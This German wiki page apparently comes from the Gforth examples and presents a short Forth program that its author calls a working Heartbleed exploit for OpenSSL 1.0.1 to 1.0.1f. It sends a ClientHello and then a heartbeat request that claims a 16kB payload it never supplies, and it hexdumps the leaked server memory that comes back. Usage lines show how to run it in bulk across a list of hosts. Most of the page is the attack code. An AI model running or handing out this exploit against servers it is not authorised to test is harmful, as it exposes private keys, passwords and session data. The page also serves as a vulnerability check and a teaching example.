Benutzer-Werkzeuge

Webseiten-Werkzeuge

Übersetzungen dieser Seite:

examples:heartbleed

Heartbleed Check

Im OpenSSL von Version 1.0.1 bis 1.0.1f (ohne g) war eine ernste Lücke, die hier mit einem kurzen Programm demonstiert wird (das ist ein funktionierender Exploit!). Verwenden mit einem neueren Gforth (snapshot), und dann mit

gforth heartbleed.fs <host> [<port>]

starten. Wenn ein länglicher Hexdump kommt, ist das die Heartbleed-Antwort. Wenn man viele URLs hat, kann man die entweder per Shell-Script abarbeiten

cat <file> | xargs -L 1 gforth heartbleed.fs

oder Gforth starten und dann

require heartbleed.fs
s" <file>" file-heartbleed

Was der Code macht, ist schnell erklärt: Er schickt zuerst ein „Client Hello“ an den Server, welcher daraufhin seine Zertifikate zurückschickt. Die werfe ich weg, denn ich will ja gar keine Verbindung aufbauen. Dann schicke ich einen Heartbeat ohne Payload und Padding, aber mit einer sehr langen Payload-Länge. Die erwarte ich dann als Antwort zurück; wenn ich sie bekomme, ist der Heartbleed-Bug vorhanden. Andere Antworten (etwa „Alert“), die TLS als Fehler schicken darf, werden ignoriert.

\ heartbleed check                                   11apr2014py
 
require unix/socket.fs
 
Create TLS-header
$16 c, $03 c, $02 c, $00 c, $31 c, \ TLS Header
$01 c, $00 c, $00 c, $2d c, \ Handshake header
$03 c, $02 c, \ ClientHello field: version number (TLS 1.1)
here  32 allot \ ClientHello field: random
$00 c, \ ClientHello field: session id
$00 c, $04 c, \ ClientHello field: cipher suite length
$00 c, $33 c, $c0 c, $11 c, \ ClientHello field: cipher suite(s)
$01 c, \ ClientHello field: compression support, length
$00 c, \ ClientHello field: compression support, no compression (0)
$00 c, $00 c, \ ClientHello field: extension length (0)
 
here TLS-header - Constant header#
 
Constant random32
 
Create TLS-heartbleed
$18 c, $03 c, $02 c, $00 c, $03 c, \ TLS header
$01 c, $40 c, $00 c, \ heartbleed request, 16kB (maximum for OpenSSL)
 
here TLS-heartbleed - Constant heartbleed#
 
: >random ( -- )
    utime $1000000 um/mod nip random32 be-l!
    s" /dev/urandom" r/o open-file throw >r
    random32 4 + 28 r@ read-file throw drop r> close-file throw ;
 
Variable buggy?
 
: get-heartbleed ( addr u port -- )  >r 2dup r>  buggy? off
    1000000 set-socket-timeout  >random
    open-socket >r
    TLS-header header# r@ write-socket
    BEGIN  r@ pad $10000 read-socket nip 0=  UNTIL
    TLS-heartbleed heartbleed# r@ write-socket
    BEGIN  r@ pad $10000 read-socket
	over c@ $18 = buggy? @ or \ heartbeet reply
	over 0<> and
    WHILE  dump buggy? on  REPEAT  2drop
    r> close-socket
    type buggy? @  IF  ." : Heartbleed detected"  ELSE  ." : Everything ok"  THEN  cr ;
 
Variable files
 
: file-heartbleed ( addr u -- )
    r/w open-file throw files $[]slurp
    files [: 443 get-heartbleed ;] $[]map ;
 
script? [IF]
    : ?nextarg ( -- addr u noarg-flag )
	argc @ 1 > IF  next-arg true  ELSE  false  THEN ;
 
    ?nextarg drop ?nextarg [IF] s>number drop [ELSE] 443 [THEN] get-heartbleed bye
[THEN]
examples/heartbleed.txt · Zuletzt geändert: 2014-04-11 22:00 von bernd